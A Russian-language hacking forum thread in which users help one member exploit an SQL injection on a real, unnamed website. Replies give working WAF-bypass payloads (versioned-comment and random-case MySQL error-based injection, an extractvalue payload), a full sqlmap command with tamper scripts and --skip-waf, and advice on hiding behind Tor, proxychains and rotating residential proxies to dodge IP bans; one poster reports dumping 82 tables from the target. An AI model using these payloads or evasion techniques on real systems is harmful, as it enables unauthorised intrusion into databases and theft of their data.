помощь SQLI

[simonlollipop]

CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order|by|1--')) OR t1.id IN (SELECT teac' at line 11​

Привет, друзья! Я застрял, пытаясь обойти SQLI. Буду благодарен за помощь и советы. Я перепробовал все возможные способы, но ничего не работает.
Даже когда запускаю через sqlmap, выдаёт ошибку: can't establish SSL connection.

 

[MrDark]

try using --tor ( you need to have tor installed and running ) , if it doesn't work try using --proxy with your own proxy. Try --random-agent

 

[etc/passwd]

CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order|by|1--')) OR t1.id IN (SELECT teac' at line 11​

Привет, друзья! Я застрял, пытаясь обойти SQLI. Буду благодарен за помощь и советы. Я перепробовал все возможные способы, но ничего не работает.
Даже когда запускаю через sqlmap, выдаёт ошибку: can't establish SSL connection.

у тебя явно проблемы с пробелами, попробуй заменить на + /**/ %0a %09

 

[Anwar]

CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order|by|1--')) OR t1.id IN (SELECT teac' at line 11​

Привет, друзья! Я застрял, пытаясь обойти SQLI. Буду благодарен за помощь и советы. Я перепробовал все возможные способы, но ничего не работает.
Даже когда запускаю через sqlmap, выдаёт ошибку: can't establish SSL connection.

можно как уже предложили через tor

так же можно proxychains поставить туда либо прокси закинуть в etc/proxychains.conf

http <ipaddress> <port> [username] [password]
http <ipaddress> <port> [username] [password]

либо прописать порт для тора, предварительно запустив сервис тора

service tor start

и запускать proxychains sqlmap -u .....

Касательно proxychains есть статьи в инете, посмотри как сделать все правильно, что оставить, а что закоментировать в конфиге

 

[c0d3x]

Он написал мне в личку, один местный гражданин поделился с ним моим контактом, поэтому пришлось поковыряться. Проблема решена за 5 минут. У него таргет ебанутый, там WAF фильтрует все слова паразиты: SELECT, CONCAT, IFNULL, CAST и так далее. При детекте WAF отдает 403 ошибку и сразу же бан IP, поэтому пришлось юзать резидентские прокси с ротацией при каждом запросе что бы эту залупу расковырять. TOR на таргете блокируется по дефолту. Но решается она просто, двумя тамперами: randomcase и versionedmorekeywords. То есть оборачиваем слова в коммент и меняем регистр каждой буквы в слове. Выгрузил ему 82 таблицы, дальше надеюсь сам разберется.

sqlmap.py -u "https://site.com/main/search.html?tt=1&d=35&g=88&k=1*" --dbs --risk=3 --dbms=MySQL --random-agent --technique=E -v3 --tamper=randomcase,versionedmorekeywords --skip-waf --proxy="http://your_proxy:port" --proxy-cred="login:password"

Рабочий пэйлоад выглядит так:

1')/*!ANd*/GTid_SUBsEt(/*!cONcAT*/(0x71717a7071,(/*!SElECT*/MId((/*!iFnulL*/(CaSt(/*!SCHeMa_Name*//*!aS*//*!nChAR*/),0x20)),1,190)/*!frOM*/INFORMATION_SCHEMA.SCHEMATA/*!lImit*/2,1),0x717a6a6a71),1353)/*!ANd*/('AKUG'='AKUG

 

[etc/passwd]

Он написал мне в личку, один местный гражданин поделился с ним моим контактом, поэтому пришлось поковыряться. Проблема решена за 5 минут. У него таргет ебанутый, там WAF фильтрует все слова паразиты: SELECT, CONCAT, IFNULL, CAST и так далее. При детекте WAF отдает 403 ошибку и сразу же бан IP, поэтому пришлось юзать резидентские прокси с ротацией при каждом запросе что бы эту залупу расковырять. TOR на таргете блокируется по дефолту. Но решается она просто, двумя тамперами: randomcase и versionedmorekeywords. То есть оборачиваем слова в коммент и меняем регистр каждой буквы в слове. Выгрузил ему 82 таблицы, дальше надеюсь сам разберется.

sqlmap.py -u "https://site.com/main/search.html?tt=1&d=35&g=88&k=1*" --dbs --risk=3 --dbms=MySQL --random-agent --technique=E -v3 --tamper=randomcase,versionedmorekeywords --skip-waf --proxy="http://your_proxy:port" --proxy-cred="login:password"

Рабочий пэйлоад выглядит так:

1')/*!ANd*/GTid_SUBsEt(/*!cONcAT*/(0x71717a7071,(/*!SElECT*/MId((/*!iFnulL*/(CaSt(/*!SCHeMa_Name*//*!aS*//*!nChAR*/),0x20)),1,190)/*!frOM*/INFORMATION_SCHEMA.SCHEMATA/*!lImit*/2,1),0x717a6a6a71),1353)/*!ANd*/('AKUG'='AKUG

Мне тоже писал. У меня так вышло

k=1%27or(extractvalue(1,make_set(3,0x3a,(/*!12345select/%0adatabase()))))and%27

, дальше были проблемы с выводом, времени не было смотреть.